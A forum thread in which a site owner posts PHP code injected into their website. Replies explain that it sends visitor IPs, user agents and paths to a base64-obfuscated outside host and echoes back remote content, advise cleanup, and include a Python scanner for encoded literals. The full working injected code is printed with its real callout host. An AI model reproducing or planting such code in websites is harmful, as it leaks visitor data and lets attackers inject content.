Unknown possible malicious code

Hi,

I checked one of my websites recently and I found the following code and I have no idea how it was placed there and what it does. If you have an idea what it does, could you please tell me.

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

It sends statistics to http://browserglobalstat.com/statD/stat.php
The URL comes from the base64 decode.

Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or JavaScript, that is a sign that something is not right. Legitimate coders don’t try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similarly to what happened to you. How access was gained to your account is anyone’s guess.

Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.
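One way to check a site's files for the pattern discussed above, as an added example that is not part of the original posts: it finds `base64_decode('...')` string literals in PHP source, decodes them, and marks the ones that turn out to be URLs. The function names `find_encoded_literals` and `scan_tree` and the sample input are assumptions made for illustration; the encoded string is the one from the question.

```python
import base64
import binascii
import re
import sys
from pathlib import Path

# base64_decode( '<literal>' ) with single or double quotes and optional spaces
B64_CALL = re.compile(r"""base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""", re.I)
URL = re.compile(r"^(?:https?|ftp)://", re.I)


def find_encoded_literals(php_source):
    """Return (line_no, decoded_text, is_url) for every base64_decode('...') literal."""
    findings = []
    for m in B64_CALL.finditer(php_source):
        line_no = php_source.count("\n", 0, m.start()) + 1
        try:
            raw = base64.b64decode("".join(m.group(2).split()), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to report
        text = raw.decode("utf-8", errors="replace")
        findings.append((line_no, text, bool(URL.match(text))))
    return findings


def scan_tree(root):
    """Scan every *.php file under root; yield (path, line_no, decoded, is_url)."""
    for path in sorted(Path(root).rglob("*.php")):
        source = path.read_text(encoding="utf-8", errors="replace")
        for line_no, text, is_url in find_encoded_literals(source):
            yield str(path), line_no, text, is_url


# Constructed sample: one line shaped like the injected code in the question,
# plus one harmless literal, to show what gets flagged as a URL.
SAMPLE = """<?php
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip=';
$greeting = base64_decode("aGVsbG8=");
?>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        hits = list(scan_tree(sys.argv[1]))
    else:
        hits = [("<sample>",) + f for f in find_encoded_literals(SAMPLE)]
    for path, line_no, text, is_url in hits:
        tag = "URL" if is_url else "text"
        print(f"{path}:{line_no}: base64_decode literal -> [{tag}] {text}")
```

Run it with the web root as the only argument to scan every `.php` file beneath it. It only sees literals passed directly to `base64_decode`, so a clean result does not replace restoring from known-good backups.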

Thanks for the info.

Thanks a lot for the suggestions. I have no idea how this code was inserted there but whether it was done manually or by a script, it was inserted in the wrong place so that the page gave an error. That’s how I spotted it.